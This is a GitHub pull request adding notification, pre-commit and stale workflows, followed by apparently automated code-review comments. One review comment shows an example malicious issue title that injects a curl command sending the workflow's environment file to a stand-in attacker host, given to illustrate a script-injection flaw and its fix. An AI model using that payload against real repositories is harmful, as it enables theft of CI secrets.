feat: implement the Probot App, Notification workflows

[RajivBB]

Description

This PR updates and enhances the GitHub Event Notification workflow to improve visibility of repository activities through Gmail and Slack notifications. Added the Stale , Pre-commit workflow and Mergeable Configuration . Updated the current workflow to adopt the reusable workflow

Key Changes

• Updated the existing notification workflow to trigger when branches are merged into develop and main.
• Added new GitHub Event notifications for:
  • New issues created
  • Updated issues
  • Pull Request opened
  • PR comments or conversations
  • PR closure or merge

Files Changed

• Added: GitHub event triggers and notification rules .github/workflows/notification.yaml
• Added: Mergeable Configuration .github/mergeable.yml
• Added: Stale Configuration .github/stale.yml
• Added: Pre-Commit Configuration .github/pre-commit.yml

Issue

Fixes #135

Summary by CodeRabbit

• Chores
  • Added repository hygiene and PR validation rules to enforce semantic titles, descriptions, linked issues, labels, assignees, and reviewers.
  • Added automated notifications for repo events to Slack and Google Chat.
  • Introduced pre-commit CI checks, scheduled stale issue/PR management, and commit-message validation.
  • Added formatting and stylelint configurations and a tool-versions manifest to standardize developer tooling.

_{✏️ Tip: You can customize this high-level summary in your review settings.}

[coderabbitai]

Walkthrough

Adds GitHub workflows and config files: a multi-event notification workflow (dispatches Slack & Google Chat), a pre-commit CI workflow, a scheduled stale cleanup workflow, Mergeable PR validation, and formatting/linting/commitlint/tool-version manifests.

Changes

Cohort / File(s)	Summary
GitHub Workflows .github/workflows/github-event-notification.yaml, .github/workflows/pre-commit.yaml, .github/workflows/stale.yml	New workflows: event-driven notifier (parses events, sets GITHUB_OUTPUT, sends Slack & Google Chat notifications), pre-commit checks (Go, Python, golangci-lint, pre-commit, Stylelint fallback), and scheduled stale issues/PRs management using actions/stale.
PR Validation .github/mergeable.yml	New Mergeable configuration enforcing semantic titles, minimum description length, linked issue reference, required labels, assignees, and reviewers; adds "validated" label on success.
Formatting & Lint Configs .prettierrc, .stylelintrc.json, commitlint.config.cjs	Adds Prettier, Stylelint, and Commitlint configurations (prettier rules, stylelint standard extension + selector rules, commitlint conventional rules and header limit).
Tool Versions .tool-versions	New tool version manifest specifying golang 1.23.0 and golangci-lint 2.7.2.

Sequence Diagram(s)

sequenceDiagram
    participant GH as GitHub Events
    participant Runner as Workflow Runner / Job
    participant Script as Event Parsing Script
    participant Outputs as GITHUB_OUTPUT
    participant Slack as Slack API
    participant Chat as Google Chat (Webhook)

    GH->>Runner: event triggers workflow (issue/PR/review/comment)
    Runner->>Script: provide $GITHUB_EVENT_PATH
    Script->>Script: detect event type, extract title/url/number/user/state/source/target, pick emoji
    Script->>Outputs: write title,url,description,emoji,number,user,state,source,target,repo_url
    Runner->>Slack: call slack action with composed block payload (uses Outputs)
    Runner->>Chat: call google-chat action with composed message (uses Outputs)
    Slack-->>Runner: deliver status
    Chat-->>Runner: deliver status

Loading

Estimated code review effort

🎯 3 (Moderate) | ⏱️ ~25 minutes

• Pay attention to: the shell event-parsing logic and edge cases in .github/workflows/github-event-notification.yaml
• Verify secrets/permissions usage and payload contents for Slack and Google Chat steps
• Confirm pre-commit workflow fallback behaviors (global config download, temporary Stylelint injection)
• Validate Mergeable rules regexes and label/assignee/reviewer requirements

Poem

🐰
I hop through YAML fields with care,
Notifying humans everywhere,
Stale threads pruned, commits kept neat,
Pre-checks hum so merges meet,
A carrot for CI — workflow sweet! 🥕

Pre-merge checks and finishing touches

✅ Passed checks (5 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The PR title 'feat: implement the Probot App, Notification workflows' clearly describes the main changes, which include implementing notification workflows and related configurations.
Linked Issues check	✅ Passed	All primary objectives from #135 are implemented: notification workflows for key events [#135], mergeable configuration [#135], stale workflow [#135], and pre-commit checks [#135].
Out of Scope Changes check	✅ Passed	Additional configuration files added (.prettierrc, .stylelintrc.json, .tool-versions, commitlint.config.cjs) support the workflow implementations and are related to code quality/linting scope.
Docstring Coverage	✅ Passed	No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

✨ Finishing touches

🧪 Generate unit tests (beta)

• Create PR with unit tests
• Post copyable unit tests in a comment
• Commit unit tests in branch feat/rajivbb/workflow

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[coderabbitai]

Actionable comments posted: 4

🧹 Nitpick comments (1)

.github/mergeable.yml (1)

18-21: Verify the issue reference regex matches common patterns.

The regex (Closes|Fixes|Resolves|Addresses)\\s+#[0-9]+(,?\\s*#[0-9]+)* requires a space between the keyword and the issue number. However, GitHub also supports formats like "Fixes: #123" or "Closes:#123". Consider whether the current regex should be updated to be more permissive.

For example, this PR's description uses "Fixes: #135" which may not match the current pattern due to the colon.

Apply this diff to make the pattern more flexible:

       - do: description
         must_include:
-          regex: "(Closes|Fixes|Resolves|Addresses)\\s+#[0-9]+(,?\\s*#[0-9]+)*"
+          regex: "(Closes|Fixes|Resolves|Addresses):?\\s+#[0-9]+(,?\\s*#[0-9]+)*"
           message: "PR must reference at least one issue (e.g., Closes #123, Fixes #123, #124)."

📜 Review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 27db189 and 7762b3e.

📒 Files selected for processing (8)

• .github/mergeable.yml (1 hunks)
• .github/workflows/github-event-notification.yaml (1 hunks)
• .github/workflows/pre-commit.yaml (1 hunks)
• .github/workflows/stale.yml (1 hunks)
• .prettierrc (1 hunks)
• .stylelintrc.json (1 hunks)
• .tool-versions (1 hunks)
• commitlint.config.cjs (1 hunks)

🧰 Additional context used

🪛 actionlint (1.7.9)

.github/workflows/pre-commit.yaml

27-27: the runner of "actions/setup-go@v4" action is too old to run on GitHub Actions. update the action's version to fix this issue

(action)

.github/workflows/github-event-notification.yaml

28-28: "github.event.issue.title" is potentially untrusted. avoid using it directly in inline scripts. instead, pass it through an environment variable. see https://docs.github.com/en/actions/reference/security/secure-use#good-practices-for-mitigating-script-injection-attacks for more details

(expression)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (3)

• GitHub Check: Lint and Test
• GitHub Check: precommit
• GitHub Check: precommit

🔇 Additional comments (6)

.prettierrc (1)

1-22: LGTM!

The Prettier configuration follows standard conventions with appropriate overrides for HTML and CSS files, and properly excludes node_modules.

commitlint.config.cjs (1)

1-24: LGTM!

The commitlint configuration properly extends the conventional config and defines comprehensive commit type rules that align with the Mergeable PR title validation requirements.

.stylelintrc.json (1)

1-9: LGTM!

The Stylelint configuration extends the standard config and applies sensible rules for consistent CSS styling.

.github/workflows/pre-commit.yaml (2)

46-55: Good fallback mechanism for missing pre-commit config.

The workflow provides a sensible fallback by downloading a global pre-commit configuration when the project-specific config is missing. This ensures consistent checks across repositories.

---

79-126: Excellent error handling and reporting.

The pre-commit execution logic properly captures exit codes, provides comprehensive summaries of failed hooks, lists affected files, and displays error details. This will significantly improve the developer experience when hooks fail.

.tool-versions (1)

2-2: No action required — version 2.7.2 is valid.

golangci-lint v2.7.2 (released Dec 7, 2025) follows the correct semantic versioning format. The project transitioned to v2.x.x releases; v1 reached v1.64.x and is no longer actively updated. The version specified in .tool-versions is accurate and properly formatted.

Likely an incorrect or invalid review comment.

[coderabbitai]

⚠️ Potential issue | 🔴 Critical

Critical: Script injection vulnerability in inline shell script.

The workflow directly interpolates untrusted GitHub event data (issue titles, PR titles, user inputs) into an inline shell script, creating a script injection vulnerability. An attacker could craft malicious titles or descriptions containing shell commands that would be executed in the workflow context.

For example, a malicious issue title like:

test'; curl attacker.com?data=$(cat $GITHUB_ENV); echo '

Fix: Pass all untrusted inputs through environment variables instead of direct interpolation.

Apply this diff:

       - name: Determine Event Type
         id: event_info
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          EVENT_ACTION: ${{ github.event.action }}
+          ISSUE_TITLE: ${{ github.event.issue.title }}
+          ISSUE_URL: ${{ github.event.issue.html_url }}
+          ISSUE_NUMBER: ${{ github.event.issue.number }}
+          ISSUE_USER: ${{ github.event.issue.user.login }}
+          ISSUE_STATE: ${{ github.event.issue.state }}
+          PR_TITLE: ${{ github.event.pull_request.title }}
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+          PR_USER: ${{ github.event.pull_request.user.login }}
+          PR_URL: ${{ github.event.pull_request.html_url }}
+          PR_STATE: ${{ github.event.pull_request.state }}
+          PR_SOURCE: ${{ github.event.pull_request.head.ref }}
+          PR_TARGET: ${{ github.event.pull_request.base.ref }}
+          PR_MERGED: ${{ github.event.pull_request.merged }}
+          REVIEW_URL: ${{ github.event.review.html_url }}
+          REVIEW_USER: ${{ github.event.review.user.login }}
+          REVIEW_STATE: ${{ github.event.review.state }}
+          COMMENT_USER: ${{ github.event.comment.user.login }}
+          COMMENT_URL: ${{ github.event.comment.html_url }}
+          REPO: ${{ github.repository }}
+          ACTOR: ${{ github.actor }}
+          REPO_URL: ${{ github.server_url }}/${{ github.repository }}
         run: |
-          EVENT="${{ github.event_name }}"
-          ACTION="${{ github.event.action }}"
-          REPO="${{ github.repository }}"
-          ACTOR="${{ github.actor }}"
-          REPO_URL="${{ github.server_url }}/${{ github.repository }}"
+          EVENT="$EVENT_NAME"
+          ACTION="$EVENT_ACTION"
 
           if [[ "$EVENT" == "issues" ]]; then
-            TITLE="Issue $ACTION: ${{ github.event.issue.title }}"
-            URL="${{ github.event.issue.html_url }}"
-            NUMBER="${{ github.event.issue.number }}"
-            USER="${{ github.event.issue.user.login }}"
+            TITLE="Issue $ACTION: $ISSUE_TITLE"
+            URL="$ISSUE_URL"
+            NUMBER="$ISSUE_NUMBER"
+            USER="$ISSUE_USER"
             DESCRIPTION="Issue #$NUMBER by $USER"
-            STATE="${{ github.event.issue.state }}"
+            STATE="$ISSUE_STATE"
             EMOJI="🐛"
 
           elif [[ "$EVENT" == "pull_request" ]]; then
-            NUMBER="${{ github.event.pull_request.number }}"
-            USER="${{ github.event.pull_request.user.login }}"
-            URL="${{ github.event.pull_request.html_url }}"
-            STATE="${{ github.event.pull_request.state }}"
-            SOURCE="${{ github.event.pull_request.head.ref }}"
-            TARGET="${{ github.event.pull_request.base.ref }}"
+            NUMBER="$PR_NUMBER"
+            USER="$PR_USER"
+            URL="$PR_URL"
+            STATE="$PR_STATE"
+            SOURCE="$PR_SOURCE"
+            TARGET="$PR_TARGET"
 
-            if [[ "$ACTION" == "closed" && "${{ github.event.pull_request.merged }}" == "true" ]]; then
-              TITLE="PR merged: ${{ github.event.pull_request.title }}"
+            if [[ "$ACTION" == "closed" && "$PR_MERGED" == "true" ]]; then
+              TITLE="PR merged: $PR_TITLE"
               EMOJI="✅"
               STATE="merged"
             elif [[ "$ACTION" == "closed" ]]; then
-              TITLE="PR closed: ${{ github.event.pull_request.title }}"
+              TITLE="PR closed: $PR_TITLE"
               EMOJI="❌"
             else
-              TITLE="PR $ACTION: ${{ github.event.pull_request.title }}"
+              TITLE="PR $ACTION: $PR_TITLE"
               EMOJI="🔀"
             fi
             DESCRIPTION="PR #$NUMBER by $USER: $SOURCE → $TARGET"
 
           elif [[ "$EVENT" == "pull_request_review" ]]; then
-            TITLE="PR Review: ${{ github.event.pull_request.title }}"
-            URL="${{ github.event.review.html_url }}"
-            NUMBER="${{ github.event.pull_request.number }}"
-            USER="${{ github.event.review.user.login }}"
-            REVIEW_STATE="${{ github.event.review.state }}"
-            STATE="${{ github.event.review.state }}"
-            SOURCE="${{ github.event.pull_request.head.ref }}"
-            TARGET="${{ github.event.pull_request.base.ref }}"
+            TITLE="PR Review: $PR_TITLE"
+            URL="$REVIEW_URL"
+            NUMBER="$PR_NUMBER"
+            USER="$REVIEW_USER"
+            REVIEW_STATE="$REVIEW_STATE"
+            STATE="$REVIEW_STATE"
+            SOURCE="$PR_SOURCE"
+            TARGET="$PR_TARGET"
             DESCRIPTION="Review by $USER on PR #$NUMBER"
             EMOJI="👀"
 
           elif [[ "$EVENT" == "issue_comment" ]]; then
-            NUMBER="${{ github.event.issue.number }}"
-            USER="${{ github.event.comment.user.login }}"
-            URL="${{ github.event.comment.html_url }}"
+            NUMBER="$ISSUE_NUMBER"
+            USER="$COMMENT_USER"
+            URL="$COMMENT_URL"
             STATE="commented"
 
             if [[ "${{ github.event.issue.pull_request }}" != "" ]]; then
-              TITLE="Comment on PR: ${{ github.event.issue.title }}"
+              TITLE="Comment on PR: $ISSUE_TITLE"
               EMOJI="💬"
             else
-              TITLE="Comment on Issue: ${{ github.event.issue.title }}"
+              TITLE="Comment on Issue: $ISSUE_TITLE"
               EMOJI="💬"
             fi
             DESCRIPTION="Comment by $USER on #$NUMBER"
 
           elif [[ "$EVENT" == "pull_request_review_comment" ]]; then
-            TITLE="Comment on PR: ${{ github.event.pull_request.title }}"
-            URL="${{ github.event.comment.html_url }}"
-            NUMBER="${{ github.event.pull_request.number }}"
-            USER="${{ github.event.comment.user.login }}"
+            TITLE="Comment on PR: $PR_TITLE"
+            URL="$COMMENT_URL"
+            NUMBER="$PR_NUMBER"
+            USER="$COMMENT_USER"
             STATE="commented"
-            SOURCE="${{ github.event.pull_request.head.ref }}"
-            TARGET="${{ github.event.pull_request.base.ref }}"
+            SOURCE="$PR_SOURCE"
+            TARGET="$PR_TARGET"
             DESCRIPTION="Review comment by $USER on PR #$NUMBER"
             EMOJI="💬"
           else
             TITLE="GitHub Event: $EVENT"
-            URL="${{ github.event.repository.html_url }}"
+            URL="$REPO_URL"
             DESCRIPTION="Event triggered in $REPO"
             STATE="N/A"
             NUMBER="N/A"
             USER="$ACTOR"
             EMOJI="📢"
           fi

Committable suggestion skipped: line range outside the PR's diff.

🧰 Tools

🪛 actionlint (1.7.9)

28-28: "github.event.issue.title" is potentially untrusted. avoid using it directly in inline scripts. instead, pass it through an environment variable. see https://docs.github.com/en/actions/reference/security/secure-use#good-practices-for-mitigating-script-injection-attacks for more details

(expression)

[coderabbitai]

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🌐 Web query:

What is the latest stable version of Go as of December 2025 and does Go 1.24 exist?

💡 Result:

The latest stable Go release as of December 8, 2025 is Go 1.25 (released August 12, 2025). Yes — Go 1.24 does exist (released February 11, 2025). [1][2]

Sources:
[1] Go 1.25 is released — go.dev blog (August 12, 2025).
[2] Go 1.24 is released — go.dev blog (February 11, 2025).

---

🌐 Web query:

What is the latest version of actions/setup-go GitHub action?

💡 Result:

The latest release is actions/setup-go v6.0.0. [1][2]

Sources:
[1] actions/setup-go README.
[2] actions/setup-go Releases (v6.0.0).

---

Update actions/setup-go to v6 (latest version).

The workflow uses actions/setup-go@v4, which is outdated. The latest version is actions/setup-go@v6. Go version 1.24 is valid and was released in February 2025, though Go 1.25 is the current latest stable release.

Apply this diff:

       - name: Set up Go
-        uses: actions/setup-go@v4
+        uses: actions/setup-go@v6
         with:
           go-version: '1.24'

Consider updating to Go 1.25 if you need the latest features and fixes.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change

	- name: Set up Go
	uses: actions/setup-go@v4
	with:
	go-version: '1.24'
	- name: Set up Go
	uses: actions/setup-go@v6
	with:
	go-version: '1.24'

🧰 Tools

🪛 actionlint (1.7.9)

27-27: the runner of "actions/setup-go@v4" action is too old to run on GitHub Actions. update the action's version to fix this issue

(action)

🤖 Prompt for AI Agents

.github/workflows/pre-commit.yaml lines 26-29: the workflow uses
actions/setup-go@v4 which is outdated; update the GitHub Action reference to
actions/setup-go@v6 (the latest major) and keep or optionally bump the
go-version input to '1.25' if you want the newest stable Go; ensure the action
tag is changed to v6 and that the go-version string remains valid.

[coderabbitai]

⚠️ Potential issue | 🟡 Minor

🧩 Analysis chain

🌐 Web query:

latest version actions/stale github action

💡 Result:

Latest release: actions/stale v10.1.1 — released Dec 3, 2025. Use in a workflow as: uses: actions/stale@v10.1.1. [1]

Sources
[1] actions/stale releases (GitHub).

---

Update actions/stale to the latest patch version.

The configuration is well-structured with reasonable timeframes (30 days to stale, 7 days to close) and appropriate exempt labels. However, v10.1.1 is available (released Dec 3, 2025) and should be used instead of v10.1.0 for the latest bug fixes and improvements.

🤖 Prompt for AI Agents

In .github/workflows/stale.yml around lines 26 to 47, the workflow uses
actions/stale@v10.1.0 which should be updated to the latest patch v10.1.1;
change the uses line to reference actions/stale@v10.1.1 to pick up the bug fixes
and improvements while leaving the rest of the configuration unchanged.

[coderabbitai]

⚠️ Potential issue | 🟡 Minor

🧩 Analysis chain

🌐 Web query:

Go 1.23.0 stable release version latest

💡 Result:

Go 1.23.0 is not the latest stable Go release. The 1.23 branch has later patch updates (latest 1.23.12), and the current stable major release is Go 1.25 (released Aug 12, 2025). [1][2][3]

Sources:

• Go 1.23 release history (shows 1.23.0 and subsequent 1.23.x releases). [1]
• Go blog: Go 1.25 released (Aug 12, 2025). [2]
• End-of-life / release summary listing (shows 1.23 branch latest patch and support status). [3]

---

Update Go version—1.23.0 is outdated; consider upgrading to 1.23.12 or the latest stable 1.25.

Go 1.23.0 is a valid release but is several patch versions behind (latest in the 1.23 branch is 1.23.12). Additionally, Go 1.25 is now the current stable release. Review and update to a more recent version based on your project's compatibility requirements.

🤖 Prompt for AI Agents

In .tool-versions around lines 1 to 1 the Go version is pinned to "golang
1.23.0", which is outdated; update this entry to a newer supported version
(e.g., "golang 1.23.12" or "golang 1.25.x") that matches your project's
compatibility, run any local build/tests to confirm compatibility, and commit
the updated .tool-versions entry.

[coderabbitai]

Actionable comments posted: 1

♻️ Duplicate comments (1)

.github/workflows/pre-commit.yaml (1)

26-29: Update actions/setup-go to v6 (latest version).

The workflow uses actions/setup-go@v4, which is outdated. The latest version is actions/setup-go@v6. Go version 1.24 is valid (released February 2025), though Go 1.25 is the current latest stable release.

Apply this diff to upgrade the action:

       - name: Set up Go
-        uses: actions/setup-go@v4
+        uses: actions/setup-go@v6
         with:
           go-version: '1.24'

Consider updating to Go 1.25 if you need the latest features and stability improvements.

📜 Review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 7762b3e and 4b03778.

📒 Files selected for processing (1)

• .github/workflows/pre-commit.yaml (1 hunks)

🧰 Additional context used

🪛 actionlint (1.7.9)

.github/workflows/pre-commit.yaml

27-27: the runner of "actions/setup-go@v4" action is too old to run on GitHub Actions. update the action's version to fix this issue

(action)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)

• GitHub Check: precommit
• GitHub Check: precommit

[coderabbitai]

⚠️ Potential issue | 🔴 Critical

Remove duplicate steps for goimports installation and PATH setup.

Lines 31–34 install goimports and add Go bin to PATH, but lines 36–37 and 39–40 repeat this work verbatim. Consolidate these into a single, cohesive step to reduce redundancy and improve clarity.

Apply this diff to consolidate:

       - name: Install goimports
         run: |
           go install golang.org/x/tools/cmd/goimports@latest
           echo "$HOME/go/bin" >> $GITHUB_PATH

-      - name: Add Go bin to PATH
-        run: echo "$HOME/go/bin" >> $GITHUB_PATH
-
-      - name: Install goimports
-        run: go install golang.org/x/tools/cmd/goimports@latest
-
       - name: Install golangci-lint v2.7.2

🤖 Prompt for AI Agents

In .github/workflows/pre-commit.yaml around lines 31 to 40 there are duplicate
steps installing goimports and adding $HOME/go/bin to PATH; remove the redundant
steps and consolidate into a single step that (1) adds $HOME/go/bin to
GITHUB_PATH once and (2) installs goimports once (go install
golang.org/x/tools/cmd/goimports@latest) so the workflow only performs these
actions one time in sequence, keeping the combined step’s name and run block
clear and removing the repeated blocks.